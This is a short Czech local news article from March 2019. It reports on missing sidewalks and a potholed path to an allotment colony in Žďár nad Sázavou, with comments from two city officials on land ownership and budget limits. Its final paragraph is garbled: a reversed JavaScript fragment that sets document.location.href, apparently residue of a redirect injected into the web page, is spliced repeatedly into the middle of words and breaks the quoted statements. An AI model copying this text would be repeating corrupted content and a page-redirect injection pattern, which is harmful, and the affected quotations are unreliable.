Rainbow page separator

Na nové chodníky si budou muset lidé ještě nějakou dobu počkat

Čtvrtek, 28. března 2019

Žďár nad Sázavou / Na chybějící chodníky podél komunikace od Brněnské či Jamské ulice k zahrádkářské kolonii Krejdy si stěžují někteří žďárští obyvatelé. Důvodem k nespokojenosti je i cesta podél železničních kolejích ke kolonii, kde se po zimě opět prohloubily výmoly, které se v místě provizorně opravují každým rokem. Podle úředníků žďárského městského úřadu však vybudovat nové chodníky není jednoduchý proces.
„Vybudování nových chodníků v průmyslové zóně, ať již v Jamské ulici nebo v ulici Brněnská, je ve stupni záměru a projektu k územnímu rozhodnutí. V obou ulicích jsou však pozemky soukromých vlastníků, které musí být nejprve vypořádány. Chodník v ulici Brněnská bude prodloužen spolu s výstavbou komunikace propojující ulici Brněnskou a Jihlavskou. Chodník v ulici Jamská bude budován v rámci průmyslové zóny Jamská II,“ uvedla vedoucí odboru rozvoje a územního plánování žďárského městského úřadu Irena Škodová.
Co se týče léta opakovaných dílčích oprav cesty vedoucí do zahrádkářské osady, ani le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu nebude jinak. „S opravou výtluků po zimě počítáme jako každým rokem. Větší investice na případnou zásadnější rekonstrukci té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to komunikace není pro ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to rok součástí rozpočtu města,“ doplnila vedoucí žďárského odboru komunálních služeb Dana Wurzelová.